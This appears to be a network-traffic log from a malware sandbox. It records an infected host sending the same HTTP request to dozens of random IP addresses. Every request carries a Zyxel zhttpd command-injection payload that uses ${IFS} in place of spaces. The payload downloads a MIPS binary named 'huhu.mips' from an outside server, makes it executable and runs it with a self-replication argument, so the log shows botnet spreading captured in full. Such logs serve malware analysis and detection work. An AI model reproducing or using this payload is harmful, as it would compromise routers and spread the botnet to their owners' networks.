                                              Jan 29, 2024 07:04:05.319098949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8184192.168.2.143802877.138.140.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319147110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8185192.168.2.14346982.92.179.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319185019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8186192.168.2.143701260.217.223.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319225073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8187192.168.2.1446504134.212.182.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319259882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8188192.168.2.1444178112.106.126.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319304943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8189192.168.2.1446764113.5.244.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319320917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8190192.168.2.145140232.3.131.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319377899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8191192.168.2.1435340114.190.233.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319402933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192192.168.2.1459144154.211.219.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319442987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8193192.168.2.143590870.244.76.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319482088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8194192.168.2.1439798143.10.176.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319530964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8195192.168.2.1456512159.234.94.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319571018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8196192.168.2.1441430166.72.63.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319619894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8197192.168.2.1448296102.99.68.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319633007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8198192.168.2.1455664213.22.239.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319664001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8199192.168.2.1435626221.181.85.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319694042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8200192.168.2.1439904130.29.56.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319736958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8201192.168.2.1446724198.127.168.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319783926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8202192.168.2.1438528221.134.223.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319818974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8203192.168.2.144080265.31.129.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319861889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8204192.168.2.143947045.78.66.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319905043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8205192.168.2.146074888.0.196.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319921017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8206192.168.2.1444710130.95.24.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319943905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8207192.168.2.144801288.217.43.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.319976091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8208192.168.2.144235871.197.225.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320014000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8209192.168.2.1447424188.224.95.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320055962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8210192.168.2.1456198129.128.98.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320117950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8211192.168.2.143963685.250.185.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320154905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8212192.168.2.1442542177.151.219.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320194960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8213192.168.2.143857495.243.132.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320240021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8214192.168.2.1440334170.117.49.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320275068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8215192.168.2.1451866154.16.136.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320317984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8216192.168.2.1442552139.84.14.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320353031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8217192.168.2.143517079.177.229.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320403099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8218192.168.2.143557671.98.15.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320435047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8219192.168.2.1433002149.158.170.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320472002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8220192.168.2.143357485.154.93.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320507050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8221192.168.2.1433278109.87.67.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320533991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8222192.168.2.1444534148.220.196.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320590019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8223192.168.2.1446390187.73.183.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320627928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8224192.168.2.1460654181.242.18.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320667028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8225192.168.2.144358470.213.85.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320708036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8226192.168.2.144658035.98.5.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320744038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8227192.168.2.145506052.134.106.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320765018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8228192.168.2.1443320108.25.205.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320811033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8229192.168.2.1453712221.119.20.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320838928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8230192.168.2.145690020.197.103.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320868015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8231192.168.2.1432940221.112.139.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320918083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8232192.168.2.144207234.90.209.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.320976019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8233192.168.2.1448342185.132.5.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321002960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8234192.168.2.145407484.249.1.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321041107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8235192.168.2.145881091.191.233.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321089029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8236192.168.2.144864237.196.65.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321109056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8237192.168.2.1439712168.115.3.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321146965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8238192.168.2.1449784199.86.147.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321192026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8239192.168.2.1437874193.30.46.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321232080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8240192.168.2.144094235.130.87.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321273088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8241192.168.2.1458002181.88.70.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321315050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8242192.168.2.143749486.157.99.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321336985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8243192.168.2.143838089.224.69.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321391106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8244192.168.2.1435874121.140.154.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321419954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8245192.168.2.1460970156.250.107.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321492910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8246192.168.2.145533038.132.232.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.321518898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8247192.168.2.1446510114.168.42.171443
                                              TimestampBytes transferredDirectionData
